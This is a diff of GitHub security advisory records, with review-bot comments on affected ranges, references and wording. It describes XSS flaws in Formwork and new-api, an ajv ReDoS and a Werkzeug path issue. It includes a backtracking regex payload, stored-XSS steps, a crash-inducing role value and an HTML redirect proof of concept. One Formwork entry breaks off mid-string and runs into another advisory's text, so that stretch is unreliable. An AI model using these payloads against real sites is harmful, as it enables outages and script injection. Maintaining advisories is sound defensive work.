diff --git a/advisories/github-reviewed/2019/07/GHSA-hf23-9pf7-388p/GHSA-hf23-9pf7-388p.json b/advisories/github-reviewed/2019/07/GHSA-hf23-9pf7-388p/GHSA-hf23-9pf7-388p.json
index 9e1feca142119..6b1268c57db52 100644
--- a/advisories/github-reviewed/2019/07/GHSA-hf23-9pf7-388p/GHSA-hf23-9pf7-388p.json
+++ b/advisories/github-reviewed/2019/07/GHSA-hf23-9pf7-388p/GHSA-hf23-9pf7-388p.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-hf23-9pf7-388p",
- "modified": "2025-04-01T16:33:05Z",
+ "modified": "2026-02-24T15:32:32Z",
 "published": "2019-07-26T16:09:47Z",
 "aliases": [
 "CVE-2019-10173"
@@ -25,7 +25,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "1.4.10"
 },
 {
 "fixed": "1.4.11"
@@ -33,9 +33,9 @@
 ]
 }
 ],
- "database_specific": {
- "last_known_affected_version_range": "<= 1.4.10"
- }
+ "versions": [
+ "1.4.10"
+ ]
 }
 ],
 "references": [
diff --git a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json
index 1c32e88eef1cb..a20e6bc61de8e 100644
--- a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json
+++ b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json
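Review bot: Changing `introduced` from `"0"` to `"1.4.10"` in the `@@ -25,7 +25,7 @@` hunk leaves every release below 1.4.10 outside the affected range, so scanners stop matching them; with `fixed` at 1.4.11 the advisory now flags exactly one version, which is also what the new `versions` array states. That is only correct if the vulnerable code first appeared in 1.4.10, and nothing in these hunks or the references cites evidence for that. The same narrowing (`introduced` set to `1.0.0` and `0.1.0`) appears in the GHSA-8v38-pw62-9cw2 and GHSA-rqff-837h-mm52 hunks further down. If the intent is that earlier versions are unverified rather than unaffected, `introduced: "0"` together with the `last_known_affected_version_range` entry this commit deletes expresses that without shrinking the match set.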
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-5mg8-w23w-74h3", - "modified": "2023-08-18T15:56:36Z", + "modified": "2026-02-23T22:45:53Z", "published": "2021-03-25T17:04:19Z", "aliases": [ "CVE-2020-8908" ], "summary": "Information Disclosure in Guava", - "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.\n", + "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json index 6386bf81eb90a..fb54a9073e854 100644 --- a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json +++ b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8v38-pw62-9cw2", - "modified": "2025-12-20T03:15:43Z", + "modified": "2026-02-20T19:56:16Z", "published": "2022-02-18T00:00:33Z", "aliases": [ "CVE-2022-0639" 
@@ -25,7 +25,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "1.0.0"
 },
 {
 "fixed": "1.5.7"
diff --git a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json
index 90fa858d67a89..efd0a189e3e1a 100644
--- a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json
+++ b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rqff-837h-mm52",
- "modified": "2022-02-24T14:00:06Z",
+ "modified": "2026-02-20T19:56:07Z",
 "published": "2022-02-15T00:02:46Z",
 "aliases": [
 "CVE-2022-0512"
@@ -25,7 +25,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "0.1.0"
 },
 {
 "fixed": "1.5.6"
diff --git a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json
index eaad37ba99926..d4b0769563ba5 100644
--- a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json
+++ b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gx7g-wjxg-jwwj",
- "modified": "2022-04-18T22:17:42Z",
+ "modified": "2026-02-18T23:33:34Z",
 "published": "2022-04-04T00:00:55Z",
 "aliases": [
 "CVE-2022-0088"
@@ -52,6 +52,10 @@
 "type": "WEB",
 "url": "https://github.com/yourls/yourls/commit/1de256d8694b0ec7d4df2ac1d5976d4055e09d59"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-0088.md"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/yourls/yourls"
diff --git a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json
index d452d221466e0..2950526f06122 100644
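Review bot: The reference added in the `@@ -52,6 +52,10 @@` hunk points at a third-party proof-of-concept write-up (`MarkLee131/awesome-web-pocs`), content the advisory database does not control and that can change or vanish after review. The same link pattern is added for CVE-2022-3766 and CVE-2022-4407 in the two phpMyFAQ hunks on the following line. Each of these advisories already references the upstream fix commit, so the write-up adds little for remediation; if it is kept, confirm that the document actually describes the listed CVE and the affected versions recorded here, since a `WEB` reference carries the advisory's implicit endorsement.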
--- a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json
+++ b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mg5h-rhjq-6v84",
- "modified": "2022-11-01T20:35:47Z",
+ "modified": "2026-02-18T23:33:51Z",
 "published": "2022-10-31T12:00:18Z",
 "aliases": [
 "CVE-2022-3766"
@@ -44,6 +44,10 @@
 "type": "WEB",
 "url": "https://github.com/thorsten/phpmyfaq/commit/c7904f2236c6c0dd64c2226b90c30af0f7e5a72d"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-3766.md"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/thorsten/phpmyfaq"
diff --git a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json
index 3becc89af6f0e..38c97bebed5e5 100644
--- a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json
+++ b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-cp9c-phxx-55xm",
- "modified": "2022-12-12T22:08:01Z",
+ "modified": "2026-02-18T23:34:01Z",
 "published": "2022-12-11T15:30:45Z",
 "aliases": [
 "CVE-2022-4407"
@@ -44,6 +44,10 @@
 "type": "WEB",
 "url": "https://github.com/thorsten/phpmyfaq/commit/1d73af34bf42764f9f9491c7ba5e9495d70e3ca5"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-4407.md"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/thorsten/phpmyfaq"
diff --git a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json
index 29d2d42046096..6575c789053ec 100644
--- a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json
+++ b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-5pxr-7m4j-jjc6", - "modified": "2025-03-19T14:49:46Z", + "modified": "2026-02-18T23:46:36Z", "published": "2024-06-07T19:37:10Z", "aliases": [ "CVE-2024-37160" ], "summary": "Cross-site scripting (XSS) vulnerability in Description metadata", - "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).\n\n### PoC\n1. Log in with an Administrator user account.\n2. Navigate to /panel/options/site/.\n3. 
Inject the JS script by adding to the description field.\n4. Simulate a victim who is not a site member visiting the website. You will notice that the JS script executes on every page they vis\n\n![image](https://github.com/getformwork/formwork/assets/170840940/1c40be24-3367-4c80-bb44-9db64ef88970)\n![image](https://github.com/getformwork/formwork/assets/170840940/68dd5bff-9db1-441b-a3b3-a0c014565f59)\n![image](https://github.com/getformwork/formwork/assets/170840940/3cd84c39-9b44-49d0-8b6a-6c8aeda7e49f)\n![image](https://github.com/getformwork/formwork/assets/170840940/f45afd87-80e9-4cf1-8121-bb4e121849c9)", + "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). 
In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2025/03/GHSA-c85w-x26q-ch87/GHSA-c85w-x26q-ch87.json b/advisories/github-reviewed/2025/03/GHSA-c85w-x26q-ch87/GHSA-c85w-x26q-ch87.json index 371cefeb3b7a5..6695e555043bd 100644 --- a/advisories/github-reviewed/2025/03/GHSA-c85w-x26q-ch87/GHSA-c85w-x26q-ch87.json +++ b/advisories/github-reviewed/2025/03/GHSA-c85w-x26q-ch87/GHSA-c85w-x26q-ch87.json 
@@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-c85w-x26q-ch87", - "modified": "2025-03-16T17:19:23Z", + "modified": "2026-02-18T23:47:37Z", "published": "2025-03-01T00:11:52Z", "aliases": [], "summary": "Formwork improperly validates input of User role preventing site and panel availability", - "details": "### Summary\n\nImproper validation of select fields allows attackers to craft an input that crashes the system, resulting in a 500 status and making the entire site and administration panel unavailable.\nThis clearly impacts the Availability aspect of the CIA triad (confidentiality, integrity, and availability), although the attack still has certain limitations.\n\n### Details\n\nThe attack involves injecting any invalid user role value (e.g. \">\") into the Role=User parameter in the /panel/users/{name}/profile page, which is the user profile update page.\nDoing this will change the users data in a way that prevents users and then the entire site from loading. Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\n\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.\n\n### PoC\n\n![2025-02-27_10-25](https://github.com/user-attachments/assets/4b5a2d71-3397-4a5b-8464-35752376115a)\n\n1. 
Intercept the request and inject an input that will trigger an error.\n\n![2025-02-27_10-25_1](https://github.com/user-attachments/assets/a888c109-a724-4478-ae80-d9e8b05ef1aa)\n\n![image](https://github.com/user-attachments/assets/e81bb9fc-8c92-413c-8cc0-0bcffd2e2922)\n\n2.After that, it will be observed that the system is shut down or completely broken. Even changing the browser or resetting the server will not be able to restore it.", + "details": "### Summary\nImproper validation of select fields allows attackers to craft an input that crashes the system, resulting in a 500 status and making the entire site and administration panel unavailable.\nThis clearly impacts the Availability aspect of the CIA triad (confidentiality, integrity, and availability), although the attack still has certain limitations.\n\n### Details\nThe attack involves injecting any invalid user role value. Doing this will change the users data in a way that prevents users and then the entire site from loading. Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.", "severity": [ { "type": "CVSS_V3", 
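Review bot: The rewritten `details` string keeps the typo `extraneous valid from being accepted` in the `### Details` section; it should read `extraneous values`. While the string is being rewritten, `the users data` would also read better as `the user's data`. Both are one-word changes inside the `+ "details"` line of the `@@ -1,11 +1,11 @@` hunk.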
diff --git a/advisories/github-reviewed/2025/03/GHSA-j3wr-m6xh-64hg/GHSA-j3wr-m6xh-64hg.json b/advisories/github-reviewed/2025/03/GHSA-j3wr-m6xh-64hg/GHSA-j3wr-m6xh-64hg.json
index 009aeb62784e7..16445bbc9a8ed 100644
--- a/advisories/github-reviewed/2025/03/GHSA-j3wr-m6xh-64hg/GHSA-j3wr-m6xh-64hg.json
+++ b/advisories/github-reviewed/2025/03/GHSA-j3wr-m6xh-64hg/GHSA-j3wr-m6xh-64hg.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-j3wr-m6xh-64hg",
- "modified": "2025-03-21T17:40:52Z",
+ "modified": "2026-02-24T16:08:07Z",
 "published": "2025-03-20T12:32:43Z",
 "aliases": [
 "CVE-2024-12704"
@@ -18,7 +18,7 @@
 {
 "package": {
 "ecosystem": "PyPI",
- "name": "llama_index"
+ "name": "llama-index-core"
 },
 "ranges": [
 {
diff --git a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json
index b09f8f6bf94da..e0a593b17c8f7 100644
--- a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json
+++ b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json
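Review bot: Renaming the PyPI package from `llama_index` to `llama-index-core` in the `@@ -18,7 +18,7 @@` hunk is not a spelling normalisation: PyPI treats `llama_index` and `llama-index` as the same project, whereas `llama-index-core` is a separate distribution with its own release history. The `introduced`/`fixed` events for this entry sit below the hunk and are not visible here, so they were presumably written against the old name; they should be re-checked against `llama-index-core` releases. If the `llama-index` meta-package is affected as well, it needs its own `affected` entry rather than being dropped by the rename.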
@@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-vf6x-59hh-332f", - "modified": "2025-03-17T20:27:03Z", + "modified": "2026-02-18T23:47:22Z", "published": "2025-03-01T00:11:46Z", "aliases": [], "summary": " Formwork has a cross-site scripting (XSS) vulnerability in Site title", - "details": "### Summary\n\nThe site title field at /panel/options/site/allows embedding JS tags, which can be used to attack all members of the system. This is a widespread attack and can cause significant damage if there is a considerable number of users.\n\n### Impact\n\nThe attack is widespread, leveraging what XSS can do. This will undoubtedly impact system availability.\n\n### Patches\n- [**Formwork 2.x** (aa3e9c6)](https://github.com/getformwork/formwork/commit/aa3e9c684035d9e8495169fde7c57d97faa3f9a2) escapes site title from panel header navigation.\n\n### Details\n\nBy embedding \"\n \n\n \n\n\n\n
\n \n
\n \n \n

正在为您跳转

\n

我们正在将您引导至 Google。
如果页面没有自动刷新,请点击下方的按钮。

\n \n \n 立即前往 Google\n
\n\n \n\n\n\n```\n\n### Acknowledgments\n\nQuantumNous would like to thank **TechnologyStar** for the early notification of this potential vulnerability via AI-assisted tools, and **small-lovely-cat** for providing additional context and an initial patch. The final fix was developed and verified by the maintainers to ensure full compatibility with the project's architecture.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/QuantumNous/new-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.10.8-alpha.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-299v-8pq9-5gjq" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25802" + }, + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/commit/ab5456eb1049aa8a0f3e51f359907ec7fff38b4b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/QuantumNous/new-api" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:10:25Z", + "nvd_published_at": "2026-02-24T01:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json new file mode 100644 index 0000000000000..1d6629b5fd33b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29vq-49wr-vm6x", + "modified": "2026-02-23T22:27:37Z", + "published": "2026-02-19T20:32:45Z", + "aliases": [ + "CVE-2026-27199" + ], + "summary": " Werkzeug safe_join() allows Windows special device names", + "details": "Werkzeug's `safe_join` function allows Windows device names as filenames if when preceded by other path segments.\n\nThis was previously reported as https://github.com/pallets/werkzeug/security/advisories/GHSA-hgf8-39gv-g3f2, but the added filtering failed to account for the fact that `safe_join` accepts paths with multiple segments, such as `example/NUL`.\n\n`send_from_directory` uses `safe_join` to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "werkzeug" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-29vq-49wr-vm6x" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27199" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/werkzeug/commit/f407712fdc60a09c2b3f4fe7db557703e5d9338d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/werkzeug" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/werkzeug/releases/tag/3.1.6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-67" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:32:45Z", + "nvd_published_at": "2026-02-21T06:17:00Z" + } +} \ No 
newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json b/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json
index 65d0ef6cccbb6..8bd8089cfb6b0 100644
--- a/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json
+++ b/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2c6v-8r3v-gh6p",
- "modified": "2026-02-17T18:43:01Z",
+ "modified": "2026-02-19T21:14:56Z",
 "published": "2026-02-17T18:43:00Z",
 "aliases": [
 "CVE-2026-25232"
@@ -40,6 +40,10 @@
 "type": "WEB",
 "url": "https://github.com/gogs/gogs/security/advisories/GHSA-2c6v-8r3v-gh6p"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25232"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/gogs/gogs/pull/8124"
@@ -64,6 +68,6 @@
 "severity": "HIGH",
 "github_reviewed": true,
 "github_reviewed_at": "2026-02-17T18:43:00Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-19T07:17:45Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json
index de94b1ac5c5f9..d88bb33cb349a 100644
--- a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json
+++ b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json
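Review bot: In the new GHSA-29vq-49wr-vm6x file, the `details` string names the earlier advisory `GHSA-hgf8-39gv-g3f2` as the incomplete first fix, but the `references` array has no entry for it, so the relationship is visible only in prose; adding `{ "type": "ADVISORY", "url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-hgf8-39gv-g3f2" }` would make it machine-readable for consumers that correlate advisories. The same string has a typo, `as filenames if when preceded by other path segments` — drop either `if` or `when`. The `introduced: "0"` range is consistent with the text, which describes the earlier filtering as never having covered multi-segment paths.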
@@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-2g4f-4pwh-qvx6", - "modified": "2026-02-17T18:10:29Z", + "modified": "2026-02-23T22:40:29Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2025-69873" ], - "summary": "ajv has ReDoS when using $data option", + "summary": "ajv has ReDoS when using `$data` option", "details": "ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the `$data` option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax (`$data` reference), which is passed directly to the JavaScript `RegExp()` constructor without validation. An attacker can inject a malicious regex pattern (e.g., `\\\"^(a|a)*$\\\"`) combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with `$data`: true for dynamic schema validation.", "severity": [ { @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "7.0.0-alpha.0" }, { "fixed": "8.18.0" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ajv" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.14.0" + } + ] + } + ] } ], "references": [ @@ -44,6 +63,10 @@ "type": "WEB", "url": "https://github.com/ajv-validator/ajv/pull/2586" }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/pull/2588" + }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/commit/720a23fa453ffae8340e92c9b0fe886c54cfe0d5" 
@@ -52,10 +75,18 @@
 "type": "WEB",
 "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
 },
+ {
+ "type": "ADVISORY",
+ "url": "https://github.com/advisories/GHSA-2g4f-4pwh-qvx6"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/ajv-validator/ajv"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ajv-validator/ajv/releases/tag/v6.14.0"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/ajv-validator/ajv/releases/tag/v8.18.0"
@@ -63,6 +94,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-1333",
 "CWE-400"
 ],
 "severity": "MODERATE",
diff --git a/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json
new file mode 100644
index 0000000000000..8bb5175975be1
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json
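Review bot: After the `@@ -25,7 +25,7 @@` and `@@ -33,6 +33,25 @@` hunks the two `ajv` ranges cover `[0, 6.14.0)` and `[7.0.0-alpha.0, 8.18.0)`, so anything that sorts between 6.14.0 and 7.0.0-alpha.0 is now implicitly unaffected. That is correct only if 6.14.0 is the last release on the 6.x line and no 7.0.0 pre-release precedes `7.0.0-alpha.0`; the previous `introduced: "0"` had no such gap, so the split deserves a reference that confirms it (the `v6.14.0` release tag added here is a start). Two `affected` entries for the same package are valid, but a single entry carrying both `ranges` would keep the package's coverage in one place, if the database's tooling accepts that form.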
